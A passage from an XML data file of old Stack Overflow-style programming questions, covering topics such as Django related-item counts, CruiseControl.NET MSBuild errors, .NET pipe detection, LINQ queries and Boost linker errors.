    <t>How to make it so if one copy of a program is running another won't be able to open?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to make it so if one copy of a program is running another won't be able to open?&lt;/p&gt;
&lt;p&gt;Or better yet, how to make it so that if one copy is already running, then trying to run another copy will just act as if you maximized the original process?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Django how do i return the total number of items that are related to a model?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Django how can i return the total number of items (count) that are related to another model, e.g the way stackoverflow does a list of questions then on the side it shows the count on the answers related to that question.&lt;/p&gt;
&lt;p&gt;This is easy if i get the questionid, i can return all answers related to that question  but when am displaying the entire list of question it becomes a bit tricky to display on the side the count showing the total count.&lt;/p&gt;
&lt;p&gt;I don't know if am clear but just think how stackoverflow displays its questions with answer,views count next to each question! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any Python OLAP/MDX ORM engines?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to the MDX/OLAP and I'm wondering if there is any ORM similar like Django ORM for Python that would support OLAP.&lt;/p&gt;
&lt;p&gt;I'm a Python/Django developer and if there would be something that would have some level of integration with Django I would be much interested in learning more about it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installation file names in Windows Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I read in this article:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://technet.microsoft.com/en-us/library/cc709628.aspx" rel="nofollow"&gt;http://technet.microsoft.com/en-us/library/cc709628.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;That Windows detects Installers through file names, following this tip, Is it better to include setup in the file name for the installer&lt;/p&gt;
&lt;p&gt;I mean ProductSetup.msi is better than Product.msi???&lt;/p&gt;
&lt;p&gt;It's hard to think that Windows does this kind of detection :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to resolve "Only one project can be specified" error from &lt;msbuild&gt; task in CruiseControl.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use the  task in CruiseControl.NET version 1.3.0.2918 with a rather straight forward :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;project name="AppBuilder 1.0 (Debug)"&amp;gt;
    &amp;lt;workingDirectory&amp;gt;c:\depot\AppBuilder\1.0\&amp;lt;/workingDirectory&amp;gt;
    &amp;lt;triggers/&amp;gt;
    &amp;lt;tasks&amp;gt;
      &amp;lt;msbuild/&amp;gt;
    &amp;lt;/tasks&amp;gt;
   &amp;lt;/project&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when the project is run it fails with this information in the build log:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;MSBUILD : error MSB1008: Only one
  project can be specified. Switch: 1.0&lt;/p&gt;
  &lt;p&gt;For switch syntax, type "MSBuild
  /help"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When I look at the ccnet.log file I find this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Starting process [C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe] in working
  directory [c:\depot\AppBuilder\1.0] with arguments [/nologo "/p:CCNetArtifactDirectory=C:\Program Files\CruiseControl.NET\server\AppBuilder 1.0 (Debug)\Artifacts;CCNetBuildCondition=ForceBuild;CCNetBuildDate=2009-01-22;CCNetBuildTime=09:25:55;CCNetIntegrationStatus=Unknown;CCNetLabel=3;
  CCNetLastIntegrationStatus=Failure;CCNetNumericLabel=3;CCNetProject=AppBuilder 1.0 (Debug);CCNetProjectUrl=&lt;a href="http://CISERVER01/ccnet;CCNetRequestSource=jstong"&gt;http://CISERVER01/ccnet;CCNetRequestSource=jstong&lt;/a&gt;;
  CCNetWorkingDirectory=c:\depot\AppBuilder\1.0\" "/l:ThoughtWorks.CruiseControl.MsBuild.XmlLogger,ThoughtWorks.CruiseControl.MsBuild.dll;C:\Program Files\CruiseControl.NET\server\AppBuilder 1.0 (Debug)\Artifacts\msbuild-results.xml"]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;from which I infer that msbuild was run in the correct working directory and that the command line passed to it was: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;/nologo "/p:CCNetArtifactDirectory=C:\Program Files\CruiseControl.NET\server\AppBuilder 1.0 (Debug)\Artifacts;CCNetBuildCondition=ForceBuild;CCNetBuildDate=2009-01-22;CCNetBuildTime=09:25:55;CCNetIntegrationStatus=Unknown;CCNetLabel=3;
  CCNetLastIntegrationStatus=Failure;CCNetNumericLabel=3;CCNetProject=AppBuilder 1.0 (Debug);CCNetProjectUrl=&lt;a href="http://CISERVER01/ccnet;CCNetRequestSource=jstong"&gt;http://CISERVER01/ccnet;CCNetRequestSource=jstong&lt;/a&gt;;
  CCNetWorkingDirectory=c:\depot\AppBuilder\1.0\" "/l:ThoughtWorks.CruiseControl.MsBuild.XmlLogger,ThoughtWorks.CruiseControl.MsBuild.dll;C:\Program Files\CruiseControl.NET\server\AppBuilder 1.0 (Debug)\Artifacts\msbuild-results.xml"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If I run this manually at the command line I get a similiar error.&lt;/p&gt;
&lt;p&gt;It appears to me that the  isn't passing the correct command line to the MSBuild executable.&lt;/p&gt;
&lt;p&gt;Can you spot my error?  Or is this version of CruiseControl.NET (1.3.0.2918) broken with respect to the  task? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>VerQueryValue Fileversion doesn't match Windows Shell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the &lt;a href="http://www.google.co.uk/url?sa=t&amp;amp;source=web&amp;amp;ct=res&amp;amp;cd=1&amp;amp;url=http%3A%2F%2Fmsdn.microsoft.com%2Fen-us%2Flibrary%2Fms647464(VS.85).aspx&amp;amp;ei=V4N4SbfNGNzFjAfoq4mzAQ&amp;amp;usg=AFQjCNGKeUAmRnuBiua6Y8uBzbkBFRGQxg&amp;amp;sig2=yInI3Sqsq-PRMuIMPmfGSA" rel="nofollow"&gt;VerQueryValue&lt;/a&gt; to retrieve strings from a DLL's VersionInfo.&lt;/p&gt;
&lt;p&gt;All works fine, except that the FileVersion displayed by Explorer (right-click on file, Properties, Details, "File Version") doesn't match the string I get from the VerQueryValue.&lt;/p&gt;
&lt;p&gt;All my other calls to VerQueryValue are working fine, but FileVersion seems to retrieve the same data as ProductVersion. I've tried two different "version info" components written in different languages ( C++ and Delphi), and both exhibit this behaviour, so I don't think it's a bug in my (or their) code.&lt;/p&gt;
&lt;p&gt;Two possibilities I can think of: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A bug in VerQueryValue&lt;/li&gt;
&lt;li&gt;or, the Windows shell actually displays something other than the FileVersion string.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Anybody know which it's likely to be?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I move service references to their own assembly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A little background:&lt;/p&gt;
&lt;p&gt;I'm creating a set of adapters to allow communication with mobile devices over different cellular networks.  This will be achieved using a class factory pattern.  At least one of the networks requires a service reference to communicate with their devices through a web service.&lt;/p&gt;
&lt;p&gt;So far I've got 3 assemblies so far which represent:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An assembly which contains the main adapter library: this contains 
&lt;ul&gt;
&lt;li&gt;The interface definition for each of the adapters&lt;/li&gt;
&lt;li&gt;Base classes &lt;/li&gt;
&lt;li&gt;The class factory to instantiate the specified adapter at runtime.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;An assembly for each network adapter implementation.&lt;/li&gt;
&lt;li&gt;An assembly that contains my main application.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Given that I don't want to be adding service references and their configuration to the main application assembly [as that's not relevant to the main application], how do I force each assembly's service reference to get its configuration from its own app.config?&lt;/p&gt;
&lt;p&gt;If I have the service reference configuration in the main app.config, everything works just fine, but if I move the configuration to the adapter's app.config everything stops working throwing the following exception at the point where I new up the Soap1Client.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"Could not find default endpoint element that references contract 'MobileService.Service1Soap' in the ServiceModel client configuration section. This might be because no configuration file was found for your application, or because no endpoint element matching this contract could be found in the client element."&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>jquery append to front/top of list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this unordered list&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;gt;
   &amp;lt;li&amp;gt;two&amp;lt;/li&amp;gt;
   &amp;lt;li&amp;gt;three&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way I can prepend to the unordered list so that it ends up like this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;gt;
   &amp;lt;li&amp;gt;ONE&amp;lt;/li&amp;gt;
   &amp;lt;li&amp;gt;two&amp;lt;/li&amp;gt;
   &amp;lt;li&amp;gt;three&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notice the "ONE" is added to the FRONT/TOP of the list.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Property 'Path' does not have a value"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the following xaml to fill the dataContext:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DataContext="{Binding RelativeSource={RelativeSource TemplatedParent}}"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The application works fine, but Cider complains that I must set the Path property.
I'm interested in the entire object, and not a specific property though.&lt;/p&gt;
&lt;p&gt;I hope there's a way to get the designer support back!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect closed pipe in redirected console output in .NET applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The .NET &lt;code&gt;Console&lt;/code&gt; class and its default &lt;code&gt;TextWriter&lt;/code&gt; implementation (available as &lt;code&gt;Console.Out&lt;/code&gt; and implicitly in e.g. &lt;code&gt;Console.WriteLine()&lt;/code&gt;) does not signal any error when the application is having its output piped to another program, and the other program terminates or closes the pipe before the application has finished. This means that the application may run for longer than necessary, writing output into a black hole.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How can I detect the closing of the other end of the redirection pipe?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A more detailed explanation follows:&lt;/p&gt;
&lt;p&gt;Here are a pair of example programs that demonstrate the problem. &lt;code&gt;Produce&lt;/code&gt; prints lots of integers fairly slowly, to simulate the effect of computation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
class Produce
{
    static void Main()
    {
        for (int i = 0; i &amp;lt; 10000; ++i)
        {
            System.Threading.Thread.Sleep(100); // added for effect
            Console.WriteLine(i);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;Consume&lt;/code&gt; only reads the first 10 lines of input and then exits:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
class Consume
{
    static void Main()
    {
        for (int i = 0; i &amp;lt; 10; ++i)
            Console.ReadLine();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If these two programs are compiled, and the output of the first piped to the second, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Produce | Consume
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... it can be observed that &lt;code&gt;Produce&lt;/code&gt; keeps on running long after &lt;code&gt;Consume&lt;/code&gt; has terminated.&lt;/p&gt;
&lt;p&gt;In reality, my &lt;code&gt;Consume&lt;/code&gt; program is Unix-style &lt;code&gt;head&lt;/code&gt;, and my &lt;code&gt;Produce&lt;/code&gt; program prints data which is costly to calculate. I'd like to terminate output when the other end of the pipe has closed the connection.&lt;/p&gt;
&lt;p&gt;How can I do this in .NET?&lt;/p&gt;
&lt;p&gt;(I know that an obvious alternative is to pass a command-line argument to limit output, and indeed that's what I'm currently doing, but I'd still like to know how to do this since I want to be able to make more configurable judgements about when to terminate reading; e.g. piping through &lt;code&gt;grep&lt;/code&gt; before &lt;code&gt;head&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; It looks horribly like the &lt;code&gt;System.IO.__ConsoleStream&lt;/code&gt; implementation in .NET is hard-coded to ignore errors 0x6D (&lt;code&gt;ERROR_BROKEN_PIPE&lt;/code&gt;) and 0xE8 (&lt;code&gt;ERROR_NO_DATA&lt;/code&gt;). That probably means I need to reimplement the console stream. Sigh...)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>problem using an instance in a with_statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently started to learn python , and I reached the &lt;strong&gt;with&lt;/strong&gt; statement . I've tried to use it with a class instance , but I think I'm doing something wrong . Here is the code :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
from __future__ import with_statement
import pdb
class Geo:
  def __init__(self,text):
    self.text = text
  def __enter__(self):
    print "entering"
  def __exit__(self,exception_type,exception_value,exception_traceback):
    print "exiting"
  def ok(self):
    print self.text
  def __get(self):
    return self.text
with Geo("line") as g :
  g.ok()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The thing is that when the interpreter reaches the &lt;strong&gt;ok&lt;/strong&gt; method inside the with statement , the following exception is raised :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
Traceback (most recent call last):
  File "dec.py", line 23, in 
    g.ok()
AttributeError: 'NoneType' object has no attribute 'ok'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does the g object have the type NoneType ? How can I use an instance with the &lt;strong&gt;with&lt;/strong&gt; statement ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Command line (or equivalent) tools for .NET development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Spending most of my time in Visual Studio and using all the IDE tools, I wish I could spend more time using either of the following.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The Command Window in Visual Studio&lt;/li&gt;
&lt;li&gt;CMD.EXE&lt;/li&gt;
&lt;li&gt;&lt;a href="http://en.wikipedia.org/wiki/Cygwin" rel="nofollow"&gt;Cygwin&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/MinGW" rel="nofollow"&gt;MinGW&lt;/a&gt;...&lt;/li&gt;
&lt;li&gt;PowerShell.&lt;/li&gt;
&lt;li&gt;Scripts?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What are your favorite and essential commands to type in, opposed to keyboard shortcuts or clicking around?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling Assembly to get Application Name VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a console application (&lt;code&gt;MyProgram.EXE&lt;/code&gt;) that references a Utilities assembly.&lt;/p&gt;
&lt;p&gt;In my Utilities assembly, I have code that does:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim asm As Assembly = Assembly.GetExecutingAssembly()
Dim location As String = asm.Location
Dim appName As String = System.IO.Path.GetDirectoryName(location)
Conole.WriteLine("AppName is: {0}", appName)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I call it from &lt;code&gt;MyProgram.EXE&lt;/code&gt;, I receive "&lt;code&gt;AppName is: Utilities.dll&lt;/code&gt;"&lt;/p&gt;
&lt;p&gt;What I want is "&lt;code&gt;AppName is: MyProgram.EXE&lt;/code&gt;"&lt;/p&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>boost::bind with functions that have parameters that are references</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I noticed that when passing reference parameters to boost bind, those parameters won't act like references.  Instead boost creates another copy of the member and the original passed in variable remains unchanged. &lt;/p&gt;
&lt;p&gt;When I change the references to pointers, everything works ok.&lt;/p&gt;
&lt;p&gt;My question is:&lt;/p&gt;
&lt;p&gt;Is it possible to get references to work, or at least give a compiling error when it tries to use reference parameters?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When is it best to change code to match standards?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have recently been put in charge of debugging two different programs which will eventually need to share an XML parsing script, at the minimum.  One was written with PureMVC, and another was built from scratch.  While it made sence, originally, to write the one from scratch (it saved a good deal of memory, but the memory problems have since been resolved).  &lt;/p&gt;
&lt;p&gt;Porting the non-PureMVC application will take a good deal of time and effort which does not need to be used, but it will make documentation and code-sharing easier.  It will also lower the overall learning curve.  With that in mind:&lt;/p&gt;
&lt;h2&gt;1. What should be taken into account when  considering whether it is best to move things to one standard?&lt;/h2&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h3&gt;(On a related note)&lt;/h3&gt;
&lt;p&gt;Some of the code is a little odd.  Because the interpreting App had to convert commands from one syntax to another, it made sense to have an interpreter Object.  Because there needed to be communication with the external environment, it made more sense to have one object interact with the environment, and for that to deal with the interpreter &lt;em&gt;exclusively&lt;/em&gt;.  &lt;/p&gt;
&lt;p&gt;Effectively, an anti-Singleton was created.  The object would only interface with the interpreter, and that's it.  If a member of another class were to try to call one of its public methods, the object would raise an Exception.&lt;/p&gt;
&lt;p&gt;There are better ways to accomplish this, but it is definitely a bit odd.  There are more standard means of accomplishing the same thing, though they often involve the creation of classes or class files which are extraordinarily large.  The only solution which I could find that was standards compliant would involve as much commenting and explanation as is currently required, if not more.  Considering this:&lt;/p&gt;
&lt;h2&gt;2. If some code is quirky, but effective, is it better to change it to make it less quirky, even if it is made a more unwieldy?&lt;/h2&gt;
</t>
  </si>
  <si>
    <t>Using a Function to create an Object in actionscript 3.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since actionscript 3.0 is based on ECMAscript it shares some similarities with javascript. One such similarity that I have been playing around with is creating Objects from functions. &lt;/p&gt;
&lt;p&gt;In javascript to create an object,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var student = new Student( 33 );
document.write( student.age );
function Student( age ){
   this.age = age;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In actionscript 3.0 Objects are usually created through class, but Objects may be created, like in javascript, through constructer functions.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package{
   import flash.display.Sprite;
   public class Main extends Sprite{
      public function Main(){
         var student = new Student( 33 );
         trace( student.age );
      }
   }
}
function Student( age ) {
   this.age = age;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However I get a compile error with the above code&lt;/p&gt;
&lt;pre&gt;
Loading configuration file C:\Program Files\Adobe\Flex Builder 3\sdks\3.1.0\frameworks\flex-config.xml
C:\Documents and Settings\mallen\Desktop\as3\Main.as(5): col: 23 Error: Incorrect number of arguments.  Expected 0
                        var student = new Student( 33 );
                                            ^
&lt;/pre&gt;
&lt;p&gt;I was wondering why this is? To make things even weirder, the following code does work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package{
    import flash.display.Sprite;
    public class Main extends Sprite{
    	public function Main(){
    		Student( 33 );
    		var student = new Student();
    		trace(student.age);
          /* When I add the two lines below, the code wont compile? */
    		//var student2 = new Student( 33 );
    		//trace(student2.age);
    	}
    }
}
function Student( age ){
    this.age = age;
    trace(age);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output for this code is&lt;/p&gt;
&lt;pre&gt;
33
undefined
undefined
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Where can I find code profiling and/or code coverage modules that work with mod_perl2?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to get this functionality under mod_perl2?&lt;/p&gt;
&lt;p&gt;And can it be triggered via web requests as opposed to the command line?  Or do I need to fake whatever $ENV variables and query strings and cookies that my script requires and use the command line somehow?&lt;/p&gt;
&lt;p&gt;Google and CPAN searches all seem to point to things that either don't even support mod_perl to begin with, or do, but are old and don't mention mod_perl2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Main UI windows not updating control -Cross-thread operation not valid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok..here is the problem&lt;/p&gt;
&lt;p&gt;I have a main UI form that has a control container that i can add some buttons item to it,and also i have a backgroundworker object that starts up a listner. When the listner events fire, i would like to create a button in that control container on the main UI form. Everything seems to work fine until i try to add a new control item to that container. I get the following exception&lt;/p&gt;
&lt;p&gt;"Cross-thread operation not valid: Control 'RadMagnifier_AcceptReject' accessed from a thread other than the thread it was created on."&lt;/p&gt;
&lt;p&gt;the code flows like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub Mainform_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    Me.SessionTableAdapter.Fill(Me.BCSSDataSet1.Session)
    FormatColumns()
    Me.BackgroundWorker2.RunWorkerAsync()
End Sub
Private Sub BackgroundWorker2_DoWork(ByVal sender As Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles BackgroundWorker2.DoWork
    Notifications()
End Sub
Private Sub Notifications()
    'Start listing for events when event is fired try to add a button to a controls container on the UI thread, and that when i get the problem
End Sub
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>java.util.logging.Logger doesn't respect java.util.logging.Level?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In plain Java SE 6 environment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Logger l = Logger.getLogger("nameless");
l.setLevel(Level.ALL);
l.fine("somemessage");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Nothing shows up in Eclipse console. &lt;em&gt;l.info("")&lt;/em&gt; and above works just fine, but anything below &lt;em&gt;fine&lt;/em&gt; just doesn't seem to work. What's could be wrong?
TIA.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to select only the records with the highest date in LINQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table, 'lasttraces', with the following fields.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Id, AccountId, Version, DownloadNo, Date
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The data looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;28092|15240000|1.0.7.1782|2009040004731|2009-01-20 13:10:22.000
28094|61615000|1.0.7.1782|2009040007696|2009-01-20 13:11:38.000
28095|95317000|1.0.7.1782|2009040007695|2009-01-20 13:10:18.000
28101|15240000|1.0.7.1782|2009040004740|2009-01-20 14:10:22.000
28103|61615000|1.0.7.1782|2009040007690|2009-01-20 14:11:38.000
28104|95317000|1.0.7.1782|2009040007710|2009-01-20 14:10:18.000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I, in &lt;a href="http://en.wikipedia.org/wiki/Language_Integrated_Query#LINQ_to_SQL"&gt;LINQ&amp;nbsp;to&amp;nbsp;SQL&lt;/a&gt;, only get the last lasttrace of every AccountId (the one with the highest date)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are good cross-platform Game API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the process of designing/building a cross-platform game engine in C++.  I would like to use an game API that has 2D/3D graphics, input, networking, audio, etc.  One API I found that meets many of these requirements except for Audio is &lt;a href="http://home.gna.org/amaltheia/"&gt;Amaltheia&lt;/a&gt;.  Can anyone suggest an API that meets all my requirements or one that meets most of the requirements that is better than &lt;a href="http://home.gna.org/amaltheia/"&gt;Amaltheia&lt;/a&gt;.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>XmlSerializer and InternalsVisibleTo attribute</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to make &lt;code&gt;XmlSerializer&lt;/code&gt; serialize internal class members by using &lt;code&gt;InternalsVisibleTo&lt;/code&gt; attribute? &lt;/p&gt;
&lt;p&gt;If it is, what assembly should I make my internals visible to. In other words, what assembly name and public key should I provide to the &lt;code&gt;InternalsVisibleTo&lt;/code&gt; attribute.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to automatically generate N "distinct" colors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote the two methods below to automatically select N distinct colors. It works by defining a piecewise linear function on the RGB cube. The benefit of this is you can also get a progressive scale if that's what you want, but when N gets large the colors can start to look similar. I can also imagine evenly subdividing the RGB cube into a lattice and then drawing points. Does anyone know any other methods? I'm ruling out defining a list and then just cycling through it. I should also say I don't generally care if they clash or don't look nice, they just have to be visually distinct.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static List&amp;lt;Color&amp;gt; pick(int num) {
	List&amp;lt;Color&amp;gt; colors = new ArrayList&amp;lt;Color&amp;gt;();
	if (num &amp;lt; 2)
		return colors;
	float dx = 1.0f / (float) (num - 1);
	for (int i = 0; i &amp;lt; num; i++) {
		colors.add(get(i * dx));
	}
	return colors;
}
public static Color get(float x) {
	float r = 0.0f;
	float g = 0.0f;
	float b = 1.0f;
	if (x &amp;gt;= 0.0f &amp;amp;&amp;amp; x &amp;lt; 0.2f) {
		x = x / 0.2f;
		r = 0.0f;
		g = x;
		b = 1.0f;
	} else if (x &amp;gt;= 0.2f &amp;amp;&amp;amp; x &amp;lt; 0.4f) {
		x = (x - 0.2f) / 0.2f;
		r = 0.0f;
		g = 1.0f;
		b = 1.0f - x;
	} else if (x &amp;gt;= 0.4f &amp;amp;&amp;amp; x &amp;lt; 0.6f) {
		x = (x - 0.4f) / 0.2f;
		r = x;
		g = 1.0f;
		b = 0.0f;
	} else if (x &amp;gt;= 0.6f &amp;amp;&amp;amp; x &amp;lt; 0.8f) {
		x = (x - 0.6f) / 0.2f;
		r = 1.0f;
		g = 1.0f - x;
		b = 0.0f;
	} else if (x &amp;gt;= 0.8f &amp;amp;&amp;amp; x &amp;lt;= 1.0f) {
		x = (x - 0.8f) / 0.2f;
		r = 1.0f;
		g = 0.0f;
		b = x;
	}
	return new Color(r, g, b);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why do pages get slower as memory usage increases in Internet Explorer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I browse to a web page that has a javascript memory leak. If I refresh the page multiple times, it will eventually use up a significant amount of memory, and javascript on the page will slow down. On this particular page, I notice a very significant slow down when IE gets up to 100MB of RAM, even though I have multiple GB free. &lt;/p&gt;
&lt;p&gt;My question is why should leaked objects cause javascript to run slowly? Does anyone have any insight into how the JS interpreter in IE is designed, such that this happens?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I resolve LNK1104 error with Boost Filesystem Library in MSCV?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble getting my project to link to the Boost (version 1.37.0) Filesystem lib file in Microsoft Visual C++ 2008 Express Edition.  The Filesystem library is &lt;b&gt;not&lt;/b&gt; a header-only library.  I have been following the &lt;i&gt;&lt;a href="http://www.boost.org/doc/libs/1_37_0/more/getting_started/windows.html" rel="nofollow"&gt;Getting Started on Windows&lt;/a&gt;&lt;/i&gt; guide posted on the official boost web page.  Here are the steps I have taken:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I used bjam to build the complete set of lib files using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bjam --build-dir="C:\Program Files\boost\build-boost" --toolset=msvc --build-type=complete
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I copied the &lt;i&gt;/libs&lt;/i&gt; directory (located in &lt;i&gt;C:\Program Files\boost\build-boost\boost\bin.v2&lt;/i&gt;) to &lt;i&gt;C:\Program Files\boost\boost_1_37_0\libs.&lt;/i&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;In Visual C++, under &lt;i&gt;Project &gt; Properties &gt; Additional Library Directories&lt;/i&gt; I added these paths:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;C:\Program Files\boost\boost_1_37_0\libs&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;C:\Program Files\boost\boost_1_37_0\libs\filesystem\build\msvc-9.0express\debug\link-static\threading-multi&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I added the second one out of desperation.  It is the exact directory where &lt;i&gt;libboost_system-vc90-mt-gd-1_37.lib&lt;/i&gt; resides.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;In &lt;i&gt;Configuration Properties &gt; C/C++ &gt; General &gt; Additional Include Directories&lt;/i&gt; I added the following path:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i&gt;C:\Program Files\boost\boost_1_37_0&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Then, to put the icing on the cake, under &lt;i&gt;Tools &gt; Options VC++ Directories &gt; Library files&lt;/i&gt;, I added the same directories mentioned in step 3.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Despite all this, when I build my project I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fatal error LNK1104: cannot open file 'libboost_system-vc90-mt-gd-1_37.lib'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Additionally, here is the code that I am attempting to compile as well as a screen shot of the aformentioned directory where the (assumedly correct) lib file resides:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include "boost/filesystem.hpp"   // includes all needed Boost.Filesystem declarations
#include &amp;lt;iostream&amp;gt;               // for std::cout
using boost::filesystem;          // for ease of tutorial presentation;
